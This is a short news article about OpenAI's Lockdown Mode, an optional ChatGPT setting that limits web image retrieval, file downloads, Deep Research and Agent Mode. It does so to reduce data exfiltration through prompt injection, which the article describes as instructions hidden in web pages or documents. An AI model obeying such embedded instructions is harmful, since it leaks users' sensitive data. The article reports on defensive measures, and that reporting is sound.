OpenAI's new feature protects you from prompt injection attacks
What's the story
OpenAI has launched a new security feature, the Lockdown Mode, to protect users from prompt injection attacks. This comes as a response to the growing threat of such attacks in AI-powered assistant systems. The company describes this mode as an optional security setting mainly for individuals and organizations that deal with sensitive data, and need stronger protection against data exfiltration attempts via malicious prompts.
Attack details
What are prompt injections?
Prompt injection attacks are a form of social engineering where attackers embed instructions in web pages, documents or other content processed by AI systems. These instructions are meant to trick an AI model into revealing information or performing unintended actions. OpenAI says Lockdown Mode is a final layer of defense on top of the protections already built into ChatGPT, its AI models and backend infrastructure.
User impact
Limitations of Lockdown Mode
OpenAI has clarified that Lockdown Mode isn't for everyone. It is aimed at scenarios where security is prioritized over convenience and access to advanced features. When activated, the mode restricts several ChatGPT capabilities such as retrieving images from the internet or displaying them in responses. The chatbot also can't download files for analysis but users can still upload files directly for review.
Feature limitations
Deep Research and Agent Mode disabled
While Lockdown Mode is active, some advanced features like Deep Research and Agent Mode are completely disabled. However, the company has clarified that this feature doesn't prevent prompt injections from appearing in content processed by ChatGPT. Instead, it minimizes the risk of an attacker exploiting network requests or connected tools to extract sensitive information from a user's account.
Impact
What about enterprise environments?
OpenAI also said that Lockdown Mode doesn't affect conversation memory, file uploads, conversation sharing settings or whether conversations may be used to improve AI models. In enterprise environments, many of these controls remain configurable by workspace administrators. Along with this new feature, the company is also launching an active session manager for users to view devices and browsers currently signed into their account.